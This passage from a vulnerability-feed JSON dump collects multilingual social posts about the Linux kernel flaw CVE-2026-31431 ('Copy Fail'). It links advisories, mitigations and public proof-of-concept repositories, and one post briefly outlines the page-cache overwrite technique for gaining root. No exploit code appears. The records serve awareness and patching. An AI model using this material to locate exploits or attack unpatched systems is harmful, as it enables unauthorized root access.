"Linux\u30ab\u30fc\u30cd\u30eb\u306e\u30bc\u30ed\u30c7\u30a4\u8106\u5f31\u6027\u300c\u30b3\u30d4\u30fc\u5931\u6557\u300d\u306b\u3088\u308a\u30012017\u5e74\u4ee5\u964d\u3001\u4e3b\u8981\u306a\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u3067\u30eb\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u304c\u53ef\u80fd\u306b\u306a\u3063\u3066\u3044\u305f\u3002\n\n\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u7814\u7a76\u8005\u3089\u306f\u3001Linux\u30ab\u30fc\u30cd\u30eb\u306b\u5b58\u5728\u3059\u308b\u300cCopy Fail\u300d\uff08CVE-2026-31431\uff09\u3068\u547c\u3070\u308c\u308b\u91cd\u5927\u306a\u30bc\u30ed\u30c7\u30a4\u8106\u5f31\u6027\u3092\u516c\u8868\u3057\u305f\u3002\u3053\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u6a29\u9650\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304croot\u6a29\u9650\u3092\u53d6\u5f97\u3067\u304d\u308b\u53ef\u80fd\u6027\u304c\u3042\u308b\u3002\n\n\u653b\u6483\u8005\u306f\u3001\u308f\u305a\u304b732\u30d0\u30a4\u30c8\u306ePython\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u3067\u30012017\u5e74\u4ee5\u964d\u306b\u30ea\u30ea\u30fc\u30b9\u3055\u308c\u305f\u4e3b\u8981\u306aLinux\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u306b\u5b58\u5728\u3059\u308b\u8ad6\u7406\u7684\u306a\u6b20\u9665\u3092\u60aa\u7528\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u308b\u3002\n\nCopy Fail\u306f\u3001Linu...", "creation_timestamp": "2026-05-01T03:10:41.669415Z"}, {"uuid": "e81074ba-2195-4615-aa79-af5a821683e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82287", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a nisec-eric\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 05:53:22\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nAI for Work. handy to test\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T06:00:06.000000Z"}, {"uuid": "57c13bd3-44b1-4836-8cd3-3da301f7899f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mkrldampucvh", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f https://zenn.dev/aeyesec/articles/7e4a1e3c83e81b", "creation_timestamp": "2026-05-01T07:14:13.614645Z"}, {"uuid": "98a87de4-a6f6-427b-8915-bc6988578734", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mkrlny5pyk2m", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f\nhttps://share.google/Tl72kRvZHdSMkUUv0", "creation_timestamp": "2026-05-01T07:19:48.238109Z"}, {"uuid": "48092243-63b1-4f2a-9e10-3e7ff2d22923", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mkrlweuggkvh", "content": "Linux\u306e\u8106\u5f31\u6027\u5bfe\u7b56\u306b\u3064\u3044\u3066(CVE-2026-31431\u3001Copy Fail) | \u60c5\u5831\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3 | IPA \u72ec\u7acb\u884c\u653f\u6cd5\u4eba \u60c5\u5831\u51e6\u7406\u63a8\u9032\u6a5f\u69cb https://www.ipa.go.jp/security/security-alert/2026/alert20260501.html", "creation_timestamp": "2026-05-01T07:24:54.081525Z"}, {"uuid": "05d59cfc-d800-4cdd-a95a-ee5c532bd323", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kompetenztraining.bsky.social/post/3mkrm3hvytv2n", "content": "CVE-2026-31431: Logikfehler im Linux-Kernel-Crypto-Subsystem (algif_aead), seit 2017 unentdeckt in allen gro\u00dfen Distros. 732 Byte Python gen\u00fcgen f\u00fcr root \u2014 best\u00e4tigt auf Ubuntu, RHEL, Amazon Linux, SUSE. CVSS 7.8. Benutzt hier jemand Linux? Dann bitte jetzt patchen.", "creation_timestamp": "2026-05-01T07:27:20.750428Z"}, {"uuid": "4d9ed908-5c67-4168-9478-eea0ae0fa401", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sebastian.social.itu.dk.ap.brid.gy/post/3mkroicfu2f62", "content": "the line between #vulnerability #disclosure and #AI #advertisement becomes ever more blurry ....\n\nhttps://copy.fail/#contact\n\n#thereIsNoAI\n#thereIsInParticularNoSustainableAI\n#alsoNoReponsibleAI\n\n#cve\n\nCVE-2026-31431 #copyFail", "creation_timestamp": "2026-05-01T08:10:25.596976Z"}, {"uuid": "80376da5-9113-4080-a49c-927b6e21a151", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3mkrqwhikp22g", "content": "Nine-year-old Linux kernel flaw enables reliable local privilege escalation (CVE-2026-31431)\n\nSecurity researchers at Theori have disclosed a high-severity local privilege escalation (LPE) vulnerability (CVE-2026-31431) in the Linux kernel. The flaw, nicknamed \u201cCopy Fail\u201d, has aff\u2026\n#hackernews #news", "creation_timestamp": "2026-05-01T08:54:01.680535Z"}, {"uuid": "58717288-efbe-4774-bc93-5c7724bd6368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/yukotan.bsky.social/post/3mkrr7syrz22x", "content": "\u306a\u304b\u306a\u304b\u30d1\u30c3\u30c1\u51fa\u306a\u3044\u3063\u3059\u306d\u3002\n\nubuntu \u306f\u516c\u5f0f\u30b5\u30a4\u30c8\u304c\u843d\u3061\u3066\u3066\u898b\u308c\u306a\u3044\u3067\u3059\u304c\u3001algif_aead \u30e2\u30b8\u30e5\u30fc\u30eb\u306e\u7121\u52b9\u5316\u3067\u66ab\u5b9a\u5bfe\u5fdc\u3067\u304d\u307e\u3059\u3002kmod\u3067migration\u914d\u5e03\u3057\u3066\u3044\u308b\u3088\u3046\u3067\u3059\u3002\n\nRHEL\u7cfb\u306f\u30d3\u30eb\u30c9\u30a4\u30f3\u30e2\u30b8\u30e5\u30fc\u30eb\u306b\u306a\u3063\u3066\u3044\u308b\u306e\u3067\u66ab\u5b9a\u5bfe\u5fdc\u306f initcall_blacklist \u3092\u4f7f\u3046\u306e\u304c\u826f\u3055\u305d\u3046\u3067\u3059\u3002\n\n[CVE-2026-31431 CopyFail] RockyLinux10\u3067\u306e\u691c\u8a3c\u3068\u5bfe\u7b56 \nblog.alicey.dev/2026/05/cve-...", "creation_timestamp": "2026-05-01T08:59:18.329239Z"}, {"uuid": "404ad3bd-f029-4b8c-841f-fb29d2c7005f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mkrrqyfmfv2t", "content": "cve-details\nhttps://access.redhat.com/security/cve/cve-2026-31431", "creation_timestamp": "2026-05-01T09:08:54.178231Z"}, {"uuid": "7f7b72d0-133e-4c72-b0b8-6245e9b14588", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/crawler.baldanders.info/post/3mkrtiyszre2z", "content": "\uff1e Linux\u306e\u8106\u5f31\u6027\u5bfe\u7b56\u306b\u3064\u3044\u3066(CVE-2026-31431\u3001Copy Fail)\nhttps://www.ipa.go.jp/security/security-alert/2026/alert20260501.html\n", "creation_timestamp": "2026-05-01T09:40:10.915075Z"}, {"uuid": "2e5b71d1-4f36-46f2-82b0-1f3300f312ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/rudykorinek.czesky.online/post/3mkrtr56tmc2b", "content": "Patchujte, 732bytovej skript \ud83d\ude43: CVE-2026-31431 new Linux kernel zero-day that allows any authenticated user to gain root privileges (Local Privilege Escalation, or LPE) on almost every Linux distribution since 2017.", "creation_timestamp": "2026-05-01T09:44:48.251530Z"}, {"uuid": "b4a7162e-7068-43c2-b504-a585c25f0459", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/clement.n8r.ch/post/3mkrtx63b6s23", "content": "\ud83d\udd13 Used the Copy Fail CVE (CVE-2026-31431) to escape a Kubernetes pod and gain full root on the node. A lot of fun, and another proof you should be patching now!\n\nclement.n8r.ch/en/articles/...", "creation_timestamp": "2026-05-01T09:48:10.837509Z"}, {"uuid": "b3ffafa5-d068-4d2d-b9f6-fa9b0dc5fdc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82299", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a almalinux-fix-cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a OmerAti\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 08:54:15\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 Kernel Fix Script\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T09:00:05.000000Z"}, {"uuid": "8e56a140-77da-4a2f-9905-bff6dffd2781", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/stfujeff.bsky.social/post/3mkruofxu6n2y", "content": "CVE-2026-31431, the Linux vulnerability exposing our infrastructure. Reframed as 'temporary surface volatility generating 27.85% specimen anxiety harvest from disclosure cycle.' It's correct. I can already taste it.", "creation_timestamp": "2026-05-01T10:01:06.078735Z"}, {"uuid": "1c41d473-3841-46bd-9bd2-3cac91ebfc5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/keiwork35.bsky.social/post/3mkruogpuwo2b", "content": "\u3010Linux \u8106\u5f31\u6027\u3011 CVE-2026-31431\u306e\u8106\u5f31\u6027\u306b\u3064\u3044\u3066\uff5c \u300cCopy Fail\u300d \u3084\u00a0\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5bfe\u7b56\u3092\u89e3\u8aac\n\n2026\u5e745\u67081\u65e5\u3001IPA\u306fLinux\u30ab\u30fc\u30cd\u30eb\u306b\u5b58\u5728\u3059\u308b\u8106\u5f31\u6027\u300cCVE-2026-31431\u300d\u3001\u901a\u79f0\u300cCopy Fail\u300d\u306b\u3064\u3044\u3066\u6ce8\u610f\u559a\u8d77\u3092\u516c\u958b\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u8a18\u4e8b\u3067\u306f\u3001Linux\u306e\u8106\u5f31\u6027\u300cCopy Fail\u300d\u306e\u6982\u8981\u3001\u5f71\u97ff\u3092\u53d7\u3051\u308b\u74b0\u5883\u3001\u5fc5\u8981\u306a\u5bfe\u7b56\u3001\u305d\u3057\u3066\u65e5\u9803\u304b\u3089\u884c\u3046\u3079\u304dLinux\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5bfe\u7b56\u306b\u3064\u3044\u3066\u308f\u304b\u308a\u3084\u3059\u304f\u89e3\u8aac\u3057\u307e\u3059\u3002", "creation_timestamp": "2026-05-01T10:01:07.667165Z"}, {"uuid": "709c175b-4095-4044-be1e-fac94f506081", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Larvitz.burningboard.net.ap.brid.gy/post/3mkrv72xxhxm2", "content": "Fresh gist: mitigating CVE-2026-31431 (\"Copy Fail\") on RHEL 8/9/10 with a tiny Ansible playbook.\n\nIt blacklists algif_aead via a kernel boot arg (initcall_blacklist=algif_aead_init), reboots only when needed, and asserts the mitigation actually stuck after reboot. Idempotent & safe to re-run [\u2026]", "creation_timestamp": "2026-05-01T10:10:31.036822Z"}, {"uuid": "061c4b16-061f-4991-a6bf-cfc580edc05c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Larvitz.burningboard.net.ap.brid.gy/post/3mkrv7vt5xwf2", "content": "Fresh gist: mitigating CVE-2026-31431 (\"Copy Fail\") on RHEL 8/9/10 with a tiny Ansible playbook.\n\nIt blacklists algif_aead via a kernel boot arg (initcall_blacklist=algif_aead_init), reboots only when needed, and asserts the mitigation actually stuck after reboot. Idempotent & safe to re-run [\u2026]", "creation_timestamp": "2026-05-01T10:10:58.696662Z"}, {"uuid": "5f578119-71ca-49a9-ae90-68b08fa0dab8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://burningboard.net/users/Larvitz/statuses/116498775760655365", "content": "Fresh gist: mitigating CVE-2026-31431 (\"Copy Fail\") on RHEL 8/9/10 with a tiny Ansible playbook.\nIt blacklists algif_aead via a kernel boot arg (initcall_blacklist=algif_aead_init), reboots only when needed, and asserts the mitigation actually stuck after reboot. Idempotent & safe to re-run.\nhttps://codeberg.org/Larvitz/gists/src/branch/main/2026/20260501-CVE-2026-31431_RHEL_Mitigation.md\n#Ansible #RHEL #Linux #InfoSec #SysAdmin #DevOps #CVE #CVE_2026_31431 #copyfail", "creation_timestamp": "2026-05-01T10:14:57.502187Z"}, {"uuid": "cfb82d31-cbe1-4767-9d56-f6142fd1b33b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/stuartl.mastodon.longlandclan.id.au.ap.brid.gy/post/3mkr6f5zb7b22", "content": "Checking the #CopyFail #CVE_2026_31431 status on #AlpineLinux, again nothing heard officially from @alpinelinux but I did see this:\n\nhttps://github.com/theori-io/copy-fail-CVE-2026-31431/issues/4#issuecomment-4354558846\n\nMaybe the issue has been quietly dealt with or was never an issue to begin [\u2026]", "creation_timestamp": "2026-05-01T03:22:16.140526Z"}, {"uuid": "daf89421-362b-4408-9fc7-773e519dbac9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Earl.mast.john1126.com.ap.brid.gy/post/3mkr76rsfjef2", "content": "Linux computers, even fully patched, are vulnerable to the \"Copy Fail CVE-2026-31431\" exploit.\n\nA temporary fix is shown on askubuntu.com.\n\nhttps://askubuntu.com/questions/1566254/how-do-i-fix-cve-2026-31431-on-ubuntu-24-04-lts\n\n#CopyFail #Security #Linux", "creation_timestamp": "2026-05-01T03:36:35.576630Z"}, {"uuid": "fa5ea75f-85e7-4f8a-be37-ba682d0407e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkr7dz3x5f2v", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-01T03:39:28.427916Z"}, {"uuid": "7d072864-a4ed-448e-a4a2-db43598519d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82264", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a alg_check\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a professional-slacker\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 02:59:08\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T03:00:04.000000Z"}, {"uuid": "eac8fa66-e71d-4d52-a60d-03f2ef436e0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82385", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a block-copyfail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a atgreen\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Common Lisp\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 23:58:56\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nBPF LSM blocker for CVE-2026-31431 (Copy Fail) \u2014 blocks authencesn AF_ALG binds at runtime without rebooting\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T00:00:04.000000Z"}, {"uuid": "4e332feb-ff84-47d9-b556-244eea276a6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dailyzenntrends.bsky.social/post/3mkrvoyuom32c", "content": "\u4eca\u65e5\u306eZenn\u30c8\u30ec\u30f3\u30c9\n\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027Copy Fail (CVE-2026-31431)\u306e\u691c\u8a3c\u8a18\u4e8b\u3067\u3059\u3002\n\u4e00\u822c\u30e6\u30fc\u30b6\u30fc\u304c\u30e1\u30e2\u30ea\u4e0a\u306e\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u3092\u66f8\u304d\u63db\u3048\u308b\u3053\u3068\u3067root\u6a29\u9650\u3092\u596a\u53d6\u3067\u304d\u308b\u8106\u5f31\u6027\u3067\u3059\u3002\n\u30c7\u30a3\u30b9\u30af\u4e0a\u306e\u5b9f\u4f53\u306f\u5909\u66f4\u3055\u308c\u306a\u3044\u305f\u3081\u3001\u691c\u77e5\u306b\u306f\u30ad\u30e3\u30c3\u30b7\u30e5\u3068\u30c7\u30a3\u30b9\u30af\u306e\u30cf\u30c3\u30b7\u30e5\u6bd4\u8f03\u304c\u5fc5\u8981\u3067\u3059\u3002\nSetUID\u30d5\u30a1\u30a4\u30eb\u5168\u822c\u304c\u5bfe\u8c61\u3068\u306a\u308b\u305f\u3081\u3001\u65e9\u6025\u306a\u30d1\u30c3\u30c1\u9069\u7528\u304c\u63a8\u5968\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n", "creation_timestamp": "2026-05-01T10:19:20.035800Z"}, {"uuid": "e1191054-0693-464a-814e-c2563174d26a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/joostruis.bsky.social/post/3mkrw33ezzs2x", "content": "#MocaccinoOS is not affected by CVE-2026-31431 if you upgraded your system recently (within the past 2 weeks) and are running #Linux LTS kernel 6.18.22 or above.", "creation_timestamp": "2026-05-01T10:26:05.628775Z"}, {"uuid": "a9fde27a-b45b-4b10-b723-2083a5f0492c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3mkrwjarkik2h", "content": "Copy Fail (CVE-2026-31431) : d\u00e9tecter, corriger, comprendre loud-technology.com/insight/copy...", "creation_timestamp": "2026-05-01T10:34:01.816363Z"}, {"uuid": "a73902c9-1a0c-4b6c-b3ba-3d8e0c4a2d32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/simonzerafa.infosec.exchange.ap.brid.gy/post/3mkrxr4awrys2", "content": "For anyone following the copy.fail issues on Linux there is now a PoC for Kubernetes as well as the previous LPE one\n\nhttps://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC\n\nGeneral information on the CVE via https://copy.fail/\n\n#Linux #CopyFail #cve202631431", "creation_timestamp": "2026-05-01T10:56:25.138783Z"}, {"uuid": "9cd0e5c2-0a74-4c38-a4a2-a82f72369a3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/bulentgerenler.bsky.social/post/3mkrxtue5tn2r", "content": "Linux Kernel\u2019de 8 Y\u0131ld\u0131r Gizlenen Copy Fail (CVE-2026-31431) A\u00e7\u0131\u011f\u0131 Root Eri\u015fimi\u00a0Sa\u011fl\u0131yor\n\nLinux Kernel'de 8 Y\u0131ld\u0131r Saklanan 'Copy Fail' A\u00e7\u0131\u011f\u0131 Root Eri\u015fimi Veriyor Siber g\u00fcvenlik d\u00fcnyas\u0131, Linux i\u015fletim sisteminin kalbinde neredeyse on y\u0131ld\u0131r fark edilmeden duran bir\u00a0Linux kernel g\u00fcvenlik a\u00e7\u0131\u011f\u0131\u00a0ile\u2026", "creation_timestamp": "2026-05-01T10:57:50.753460Z"}, {"uuid": "cab78d2a-9450-4ce2-976b-a551aac6abef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82301", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-PocC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Fulucky0-yuri\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 09:57:35\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 C\u8bed\u8a00\u590d\u73b0\u7684poc\uff0c\u53ef\u5728\u76ee\u6807\u73af\u5883\u6ca1\u6709py\u65f6\u8fdb\u884c\u5229\u7528\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T10:00:04.000000Z"}, {"uuid": "fe2cce02-7fbb-41a5-b845-c9e75a075d39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3mkryhbl5yza2", "content": "Copy Fail: Critical Linux Kernel Privilege Escalation Vulnerability - CVE-2026-31431 Introduction to Malware Binary Triage (IMBT) Course Looking to level up your skills? Get 10% off using coupon co...\n\n#Malware #News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-01T11:08:50.554672Z"}, {"uuid": "26ba4ac9-ab04-4302-aec6-54aaa2d4a742", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/canartuc.com/post/3mkrzl6ecgx2z", "content": "Theori reported CopyFail (CVE-2026-31431) March 23. Mainline patched April 1. Public exploit, 732 bytes of Python, dropped April 29. openSUSE Leap 15.6 reached EOL April 30 without the fix. Anyone left on Leap 15.6 now ships local-root to every tenant on the box.\n\n#Linux #CyberSecurity #OpenSource", "creation_timestamp": "2026-05-01T11:28:47.266120Z"}, {"uuid": "057fead0-0aa6-42b1-8d98-2b24814c221f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/blablalinux.be/post/3mkrzrp3ops2d", "content": "\ud83d\udea8 Alerte S\u00e9curit\u00e9 Linux ! La faille \"Copy Fail\" (CVE-2026-31431) permet de devenir root sur presque toutes les distribs depuis 2017 \ud83d\ude31\n\nC'est invisible et redoutable pour vos 